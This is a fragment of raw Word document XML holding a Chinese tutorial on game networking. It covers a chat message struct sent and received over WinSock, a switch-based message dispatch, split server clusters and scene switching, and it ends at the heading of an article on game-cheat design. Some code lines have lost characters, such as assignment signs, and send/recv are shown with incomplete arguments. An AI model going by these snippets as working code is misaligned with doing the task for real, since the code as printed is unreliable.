          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　上面是抽象出来的一个极为简单的消息包结构，我们先来谈谈其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>各个数据域的用途：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是消息指令的类型，这是最为基本的消息标识，这个标识用来告诉服务器或客户端这条指令的具体用途，以便于服务器或客户端做出相应处理。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lPlayerID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被作为玩家的标识。大家知道，一个玩家在机器内部实际上也就是一堆数据，特别是在游戏服务器中，可能有成千上万个玩家，这时候我们需要一个标记来区分玩家，这样就可以迅速找到特定玩家，并将通讯数据应用于其上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">strTalk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们要传递的聊天数据，这部分才是真正的数据实体，前面的参数只是数据实体应用范围的限定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在组织完数据之后，紧接着就是把这个结构体数据通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接发送出去和接收进来。这里我们要了解，网络在进行数据传输过程中，它并不关心数据采用的数据结构，这就需要我们把数据结构转换为二进制数据码进行发送，在接收方，我们再将这些二进制数据码转换回程序使用的相应数据结构。让我们来看看如何实现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">tagMessageMsg; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">Msg.lTypeMSG_CHAT; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">Msg.lPlayerID 1000; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strcpy( &amp;Msg.strTalk, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>聊天信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先，我们假设已经组织好一个数据包，这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MSG_CHAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们自行定义的标识符，当然，这个标识符在服务器和客户端要统一。玩家的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则根据游戏需要来进行设置，这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只作为假设，现在继续：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>char* p = (char*)&amp;Msg;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">long lLength = sizeof( tagMessage ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>send( sSocket, p, lLength );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据结构的长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们通过强行转换把结构体转变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的数据指针，这样就可以通过这个指针来进行流式数据处理，这里通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sizeof() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得结构体长度，然后用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Send() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数将数据发送出去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接下来看看如何接收数据：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>long lLength = sizeof( tagMessage );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>char* Buffer = new char[lLength];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>recv( sSocket, Buffer, lLength );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tagMessage* p = (tagMessage*)Buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WinSock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">recv() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数获取网络数据之后，我们同样通过强行转换把获取出来的缓冲数据转换为相应结构体，这样就可以方便地对数据进行访问。（注：强行转换仅仅作为数据转换的一种手段，实际应用中有更多可选方式，这里只为简洁地说明逻辑）谈到此处，不得不提到服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端如何去筛选处理各种消息以及如何对通讯数据包进行管理。无论是服务器还是客户端，在收到网络消息的时候，通过上面的数据解析之后，还必须对消息类型进行一次筛选和派分，简单来说就是类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的消息循环，不同消息进行不同处理。这可以通过一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">switch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句（熟悉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息循环的朋友相信已经明白此意），基于消</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>息封包里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，对消息进行区分处理，考虑如下代码片段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">switch( p-&gt;lType ) // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p-&gt;lType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为我们解析出来的消息类型标识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case MSG_CHAT: // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>聊天消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case MSG_MOVE: // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>玩家移动消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case MSG_EXIT: // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>玩家离开消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　上面片段中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MSG_MOVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MSG_EXIT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是我们虚拟的消息标识（一个真实游戏中的标识可能会有上百个，这就需要考虑优化和优先消息处理问题）。此外，一个网络游戏服务器面对的是成百上千的连接用户，我们还需要一些合理的数据组织管理方式来进行相关处理。普通的单体游戏服务器，可能会因为当机或者用户过多而导致整个游戏网络瘫痪，而这也就引入分组服务器机制，我们把服务器分开进行数据的分布式处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们把每个模块提取出来，做成专用的服务器系统，然后建立一个连接所有服务器的数据中心来进行数据交互，这里每个模块均与数据中心创建了连接，保证了每个模块的相关性，同时玩家转变为与当前提供服务的服务器进行连接通讯，这样就可以缓解单独一台服务器所承受的负担，把压力分散到多台服务器上，同时保证了数据的统一，而且就算某台服务器因为异常而当机也不会影响其他模块的游戏玩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>家，从而提高了整体稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　分组式服务器缓解了服务器的压力，但也带来了服务器调度问题，分组式服务器需要对服务器跳转进行处理，就以一个玩家进行游戏场景跳转作为讨论基础：假设有一玩家处于游戏场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，他想从场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在游戏中，我们称之场景切换，这时玩家就会触发跳转需求，比如走到了场景中的切换点，这样服务器就把玩家数据从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除，同时在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中把玩家建立起来。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这里描述了场景切换的简单模型，当中处理还有很多步骤，不过通过这样的思考相信大家可以派生出很多应用技巧。不过需要注意的是，在场景切换或者说模块间切换的时候，需要切实考虑好数据的传输安全以及逻辑合理性，否则切换很可能会成为将来玩家复制物品的桥梁。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　本篇讲述的都是通过一些简单的过程来进行网络游戏通讯，提供了一个制作的思路，虽然具体实现起来还有许多要做，但只要顺着这个思路去扩展、去完善，相信大家很快就能够编写出自己的网络通讯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>模块。由于时间仓促，本文在很多细节方面都有省略，文中若有错误之处也望大家见谅。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go*odmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏外挂设计技术探讨①</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
